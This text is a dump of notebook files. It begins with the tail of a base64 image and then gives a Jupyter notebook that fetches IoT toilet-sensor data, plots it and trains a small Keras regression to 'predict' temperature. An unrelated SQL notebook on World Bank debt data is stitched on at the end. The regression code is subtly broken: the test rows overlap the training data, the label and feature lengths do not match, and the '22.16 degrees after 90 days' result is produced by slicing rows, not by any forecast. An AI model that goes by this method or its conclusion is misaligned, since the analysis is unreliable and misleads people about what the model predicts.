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\" width=\"200\"/>\n</div>", "_____no_output_____" ], [ "**API Validation & Prediction** <br>\nThis document will be validate the gathered API Data and will is able to being used for predictions and analyses\n\n***Temperature Prediction*** <br>\nTo start off Machine Learning is being used to predict the temperature of the certain amount of days in the toilet. By using basic regression model (linear) its possible to predict the temperature based on the API data thats being generated by the device.", "_____no_output_____" ], [ "# Imports <br>\nIn the first stage of the notebook all imports should be made for running the code later on in the notebook", "_____no_output_____" ] ], [ [ "import urllib.request\nimport json\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import fashion_mnist\nimport datetime\n\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nprint(tf.__version__)\n\n# Disable copy warn\npd.options.mode.chained_assignment = None # default='warn'", "_____no_output_____" ] ], [ [ "# Fetching API <br>\nFirst gather the API Data from the URL. 
After that print the first elements of the fetched data", "_____no_output_____" ] ], [ [ "with urllib.request.urlopen(\"https://us-central1-bava-solutions.cloudfunctions.net/GetLogsOfADevice/.F0:08:D1:D8:07:D4\") as url:\n data = json.loads(url.read().decode())", "_____no_output_____" ], [ "df = pd.DataFrame(data)\ndf.tail()\n# df['timestamp'][0]", "_____no_output_____" ] ], [ [ "# Plotting the data", "_____no_output_____" ] ], [ [ "df.plot(x='timestamp', y='tvoc_co2')", "_____no_output_____" ], [ "# Reading TVOC\ndf = pd.DataFrame(data)\ndf.plot(x='timestamp', y='tvoc_ppm')", "_____no_output_____" ], [ "# Reading humidty\ndf.plot(x='timestamp', y='hum')", "_____no_output_____" ], [ "# Reading temperature\ndf.plot(x='timestamp', y='temp')", "_____no_output_____" ] ], [ [ "# The numbers mason <br>\nThe numbers mason what do they mean?", "_____no_output_____" ] ], [ [ "# Getting all triggers by occupation\ntriggerd_by_occupation = df[df['occupied']==1]\ntriggerd_by_occupation.count()['occupied']", "_____no_output_____" ], [ "# Getting all triggers by timer\ntriggerd_by_timer = df[df['occupied']==0]\ntriggerd_by_timer.count()['occupied']", "_____no_output_____" ] ], [ [ "# Predictions <br>\n**Predictions based on Machine learning data**<br> \nFirst prediction is determining what the temperature might be in a few days.\n", "_____no_output_____" ] ], [ [ "# Tensorflow\nnp.set_printoptions(precision=3, suppress=True)", "_____no_output_____" ] ], [ [ "#Clean the data. Drop any columns with missing values or null values.\n\ndropping timestamp and mac because they are categorical and irrelevant.\n\ndropping BatteryLevel and LiquidLevel because they all have same data.", "_____no_output_____" ] ], [ [ "dataset = df.copy()\ndataset.isna().sum()\n\ndataset.dropna()\ncleaned_dataset = dataset.drop(['mac', 'batteryLevel', 'liquidLevel', 'occupied'], axis=1)\n\ntemp = cleaned_dataset\n\nfor i in range(len(cleaned_dataset['timestamp'])):\n cleaned_dataset['timestamp'][i] = datetime.datetime.utcfromtimestamp((cleaned_dataset['timestamp'][i]['_seconds']) ).strftime('%Y-%m-%d')\n\ncleaned_dataset.index = pd.to_datetime(cleaned_dataset['timestamp'])\ncleaned_dataset = cleaned_dataset[cleaned_dataset['tvoc_ppm'] != 0]\ncleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)\ncleaned_dataset\n", "_____no_output_____" ] ], [ [ "#Splitting for regression using Tensorflow", "_____no_output_____" ] ], [ [ "\ntrain_data = cleaned_dataset.sample(frac=0.5, random_state=0)\n\ntest_data = cleaned_dataset.sample(frac=0.2, random_state=0)\n\n# test_data\n\n# cleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)\n\n# train_data, test_data = np.split(cleaned_dataset, [int(.3 *len(data))])\n\ntrain_data\nprint(len(test_data), len(train_data), len(cleaned_dataset))\n\n# Y = cleaned_dataset['temp']\n# x = cleaned_dataset.loc[:, cleaned_dataset.columns != 'temp']", "12 30 61\n" ] ], [ [ "#Split attributes and labels apart", "_____no_output_____" ] ], [ [ "train_features = cleaned_dataset.copy()\ntest_features = cleaned_dataset.copy()\n\ntrain_labels = train_features.pop('temp')\ntest_labels = test_features.pop('temp')\n\n\n\ntrain_labels\n\ntrain_data = train_data.drop(['temp'], axis=1)\ntest_data = test_data.drop(['temp'], axis=1)\n\nprint(test_data)\n\n# train_dataset_timeseries = keras.preprocessing.timeseries_dataset_from_array(train_data, train_labels, sequence_length=len(train_data))\n# TimeSeries", " tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 6 148 99621 37 185\n2021-12-02 3 147 99624 
38 166\n2021-12-02 8 142 99682 36 198\n2021-12-02 3 148 99615 37 168\n2021-12-01 7 156 99526 40 194\n2021-12-01 134 160 99480 40 1\n2021-12-02 3 148 99621 37 166\n2021-12-02 1 143 99679 36 155\n2021-12-02 3 147 99633 36 170\n2021-12-02 5 146 99635 38 182\n2021-12-01 105 160 99483 41 66\n2021-12-01 14 157 99515 39 239\n" ], [ "train_stat = train_data.describe().transpose()[['mean', 'std']]\ntrain_stat", "_____no_output_____" ] ], [ [ "#Normalization\n***Normalizing is helpful to bound data between the range from 0 to 1***", "_____no_output_____" ] ], [ [ "def normalize(row):\n # t = row['timestamp']\n \n\n answer = (row - train_stat['mean']) / train_stat['std']\n print(row, answer)\n # answer['timestamp'] = t\n \n return answer\n\nnormed_train = normalize(train_data)\nnormed_test = normalize(test_data)\n\nprint(normed_test)\n\n\n\nnormed_train = np.asarray(normed_train).astype(np.float32)\nnormed_test = np.asarray(normed_test).astype(np.float32)\n\n# normed_train\n# normed_test\ntrain_labels", " tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 6 148 99621 37 185\n2021-12-02 3 147 99624 38 166\n2021-12-02 8 142 99682 36 198\n2021-12-02 3 148 99615 37 168\n2021-12-01 7 156 99526 40 194\n2021-12-01 134 160 99480 40 1\n2021-12-02 3 148 99621 37 166\n2021-12-02 1 143 99679 36 155\n2021-12-02 3 147 99633 36 170\n2021-12-02 5 146 99635 38 182\n2021-12-01 105 160 99483 41 66\n2021-12-01 14 157 99515 39 239\n2021-12-02 1 148 99618 37 151\n2021-12-02 5 147 99635 37 182\n2021-12-02 1 148 99621 36 157\n2021-12-02 3 146 99636 37 164\n2021-12-02 2 146 99645 36 159\n2021-12-01 59 159 99497 40 25\n2021-12-02 1 152 99580 37 151\n2021-12-02 1 148 99616 37 155\n2021-12-02 4 146 99637 36 171\n2021-12-02 2 148 99613 37 160\n2021-12-02 4 146 99638 37 176\n2021-12-02 1 145 99663 36 153\n2021-12-02 3 149 99608 37 169\n2021-12-02 1 144 99658 36 157\n2021-12-02 4 148 99617 37 171\n2021-12-02 1 150 99592 37 155\n2021-12-01 83 160 99485 41 183\n2021-12-02 1 148 99616 37 151 tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 -0.287616 -0.257977 0.309777 -0.284314 0.617113\n2021-12-02 -0.377186 -0.451459 0.361311 0.371796 0.212798\n2021-12-02 -0.227904 -1.418871 1.357636 -0.940424 0.893750\n2021-12-02 -0.377186 -0.257977 0.206709 -0.284314 0.255357\n2021-12-01 -0.257760 1.289883 -1.322135 1.684015 0.808631\n2021-12-01 3.534000 2.063813 -2.112324 1.684015 -3.298362\n2021-12-02 -0.377186 -0.257977 0.309777 -0.284314 0.212798\n2021-12-02 -0.436898 -1.225389 1.306102 -0.940424 -0.021280\n2021-12-02 -0.377186 -0.451459 0.515913 -0.940424 0.297917\n2021-12-02 -0.317473 -0.644941 0.550269 0.371796 0.553274\n2021-12-01 2.668165 2.063813 -2.060790 2.340125 -1.915178\n2021-12-01 -0.048765 1.483365 -1.511093 1.027905 1.766219\n2021-12-02 -0.436898 -0.257977 0.258243 -0.284314 -0.106399\n2021-12-02 -0.317473 -0.451459 0.550269 -0.284314 0.553274\n2021-12-02 -0.436898 -0.257977 0.309777 -0.940424 0.021280\n2021-12-02 -0.377186 -0.644941 0.567447 -0.284314 0.170238\n2021-12-02 -0.407042 -0.644941 0.722049 -0.940424 0.063839\n2021-12-01 1.294772 1.870330 -1.820298 1.684015 -2.787647\n2021-12-02 -0.436898 0.515953 -0.394522 -0.284314 -0.106399\n2021-12-02 -0.436898 -0.257977 0.223887 -0.284314 -0.021280\n2021-12-02 -0.347329 -0.644941 0.584625 -0.940424 0.319196\n2021-12-02 -0.407042 -0.257977 0.172353 -0.284314 0.085119\n2021-12-02 -0.347329 -0.644941 0.601803 -0.284314 0.425595\n2021-12-02 -0.436898 -0.838424 1.031254 -0.940424 -0.063839\n2021-12-02 -0.377186 -0.064494 0.086463 -0.284314 
0.276637\n2021-12-02 -0.436898 -1.031906 0.945364 -0.940424 0.021280\n2021-12-02 -0.347329 -0.257977 0.241065 -0.284314 0.319196\n2021-12-02 -0.436898 0.128988 -0.188386 -0.284314 -0.021280\n2021-12-01 2.011325 2.063813 -2.026434 2.340125 0.574553\n2021-12-02 -0.436898 -0.257977 0.223887 -0.284314 -0.106399\n tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 6 148 99621 37 185\n2021-12-02 3 147 99624 38 166\n2021-12-02 8 142 99682 36 198\n2021-12-02 3 148 99615 37 168\n2021-12-01 7 156 99526 40 194\n2021-12-01 134 160 99480 40 1\n2021-12-02 3 148 99621 37 166\n2021-12-02 1 143 99679 36 155\n2021-12-02 3 147 99633 36 170\n2021-12-02 5 146 99635 38 182\n2021-12-01 105 160 99483 41 66\n2021-12-01 14 157 99515 39 239 tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 -0.287616 -0.257977 0.309777 -0.284314 0.617113\n2021-12-02 -0.377186 -0.451459 0.361311 0.371796 0.212798\n2021-12-02 -0.227904 -1.418871 1.357636 -0.940424 0.893750\n2021-12-02 -0.377186 -0.257977 0.206709 -0.284314 0.255357\n2021-12-01 -0.257760 1.289883 -1.322135 1.684015 0.808631\n2021-12-01 3.534000 2.063813 -2.112324 1.684015 -3.298362\n2021-12-02 -0.377186 -0.257977 0.309777 -0.284314 0.212798\n2021-12-02 -0.436898 -1.225389 1.306102 -0.940424 -0.021280\n2021-12-02 -0.377186 -0.451459 0.515913 -0.940424 0.297917\n2021-12-02 -0.317473 -0.644941 0.550269 0.371796 0.553274\n2021-12-01 2.668165 2.063813 -2.060790 2.340125 -1.915178\n2021-12-01 -0.048765 1.483365 -1.511093 1.027905 1.766219\n tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 -0.287616 -0.257977 0.309777 -0.284314 0.617113\n2021-12-02 -0.377186 -0.451459 0.361311 0.371796 0.212798\n2021-12-02 -0.227904 -1.418871 1.357636 -0.940424 0.893750\n2021-12-02 -0.377186 -0.257977 0.206709 -0.284314 0.255357\n2021-12-01 -0.257760 1.289883 -1.322135 1.684015 0.808631\n2021-12-01 3.534000 2.063813 -2.112324 1.684015 -3.298362\n2021-12-02 -0.377186 -0.257977 0.309777 -0.284314 0.212798\n2021-12-02 -0.436898 -1.225389 1.306102 -0.940424 -0.021280\n2021-12-02 -0.377186 -0.451459 0.515913 -0.940424 0.297917\n2021-12-02 -0.317473 -0.644941 0.550269 0.371796 0.553274\n2021-12-01 2.668165 2.063813 -2.060790 2.340125 -1.915178\n2021-12-01 -0.048765 1.483365 -1.511093 1.027905 1.766219\n" ] ], [ [ "#Building the model using Tensorflow Keras", "_____no_output_____" ] ], [ [ "# For building the model using function for in the future its better to create multiple models\ndef create_model():\n model = keras.Sequential([\n layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_data.keys())]),\n layers.Dense(1)\n ])\n\n optimiser = tf.keras.optimizers.RMSprop(0.001)\n model.compile(loss='mse', optimizer=optimiser, metrics=['mae', 'mse'])\n\n return model", "_____no_output_____" ], [ "model = create_model()", "_____no_output_____" ] ], [ [ "#Insights of the model", "_____no_output_____" ] ], [ [ "model.summary() # Overview of the created model", "Model: \"sequential\"\n_________________________________________________________________\n Layer (type) Output Shape Param # \n=================================================================\n dense (Dense) (None, 64) 384 \n \n dense_1 (Dense) (None, 1) 65 \n \n=================================================================\nTotal params: 449\nTrainable params: 449\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "early_block = keras.callbacks.EarlyStopping(monitor='val_loss', patience=100) # Add auto stop incase the loss is less enough.\n\n\n# 
Training model\nfull_model = model.fit(normed_train, train_labels, epochs=10000, validation_split=0.2, verbose=0, callbacks=[early_block]) # Actual model training", "_____no_output_____" ] ], [ [ "# Model training validation\nHow well did the model train? How large is the loss?\n", "_____no_output_____" ] ], [ [ "losses = pd.DataFrame(model.history.history)\nlosses.plot() # Plot the loss", "_____no_output_____" ] ], [ [ "## Model Testing\n", "_____no_output_____" ] ], [ [ "# Testing the model on the normalized test set: X = sample index, Y = predicted temperature\ntestmodel = pd.DataFrame(model.predict(normed_test))\ntestmodel.plot()", "_____no_output_____" ], [ "# Predict what the temperature will be after a given number of days\nhowmany = 90 # 90 days\nanswer = model.predict([normed_test[0:(howmany % len(normed_test))]])\nprint(f\"The temperature would be {answer.mean()} degrees after {howmany}\")", "The temperature would be 22.158369064331055 degrees after 90\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb209dd17f2318667cbb24c7aacf450e8c696a5e
24,382
ipynb
Jupyter Notebook
SQL/debt.ipynb
verneh/DataSci
cbbecbd780368c2a4567aaf9ec8d66f7c7cdfa06
[ "MIT" ]
null
null
null
SQL/debt.ipynb
verneh/DataSci
cbbecbd780368c2a4567aaf9ec8d66f7c7cdfa06
[ "MIT" ]
null
null
null
SQL/debt.ipynb
verneh/DataSci
cbbecbd780368c2a4567aaf9ec8d66f7c7cdfa06
[ "MIT" ]
null
null
null
24,382
24,382
0.645968
[ [ [ "## 1. The World Bank's international debt data\n<p>It's not that we humans only take debts to manage our necessities. A country may also take debt to manage its economy. For example, infrastructure spending is one costly ingredient required for a country's citizens to lead comfortable lives. <a href=\"https://www.worldbank.org\">The World Bank</a> is the organization that provides debt to countries.</p>\n<p>In this notebook, we are going to analyze international debt data collected by The World Bank. The dataset contains information about the amount of debt (in USD) owed by developing countries across several categories. We are going to find the answers to questions like: </p>\n<ul>\n<li>What is the total amount of debt that is owed by the countries listed in the dataset?</li>\n<li>Which country owns the maximum amount of debt and what does that amount look like?</li>\n<li>What is the average amount of debt owed by countries across different debt indicators?</li>\n</ul>\n<p><img src=\"https://assets.datacamp.com/production/project_754/img/image.jpg\" alt=\"\"></p>\n<p>The first line of code connects us to the <code>international_debt</code> database where the table <code>international_debt</code> is residing. Let's first <code>SELECT</code> <em>all</em> of the columns from the <code>international_debt</code> table. Also, we'll limit the output to the first ten rows to keep the output clean.</p>", "_____no_output_____" ] ], [ [ "%%sql\npostgresql:///international_debt\n \n ", "_____no_output_____" ] ], [ [ "## 2. Finding the number of distinct countries\n<p>From the first ten rows, we can see the amount of debt owed by <em>Afghanistan</em> in the different debt indicators. But we do not know the number of different countries we have on the table. There are repetitions in the country names because a country is most likely to have debt in more than one debt indicator. </p>\n<p>Without a count of unique countries, we will not be able to perform our statistical analyses holistically. In this section, we are going to extract the number of unique countries present in the table. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT COUNT(DISTINCT country_name) AS total_distinct_countries\nFROM international_debt;", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 3. Finding out the distinct debt indicators\n<p>We can see there are a total of 124 countries present on the table. As we saw in the first section, there is a column called <code>indicator_name</code> that briefly specifies the purpose of taking the debt. Just beside that column, there is another column called <code>indicator_code</code> which symbolizes the category of these 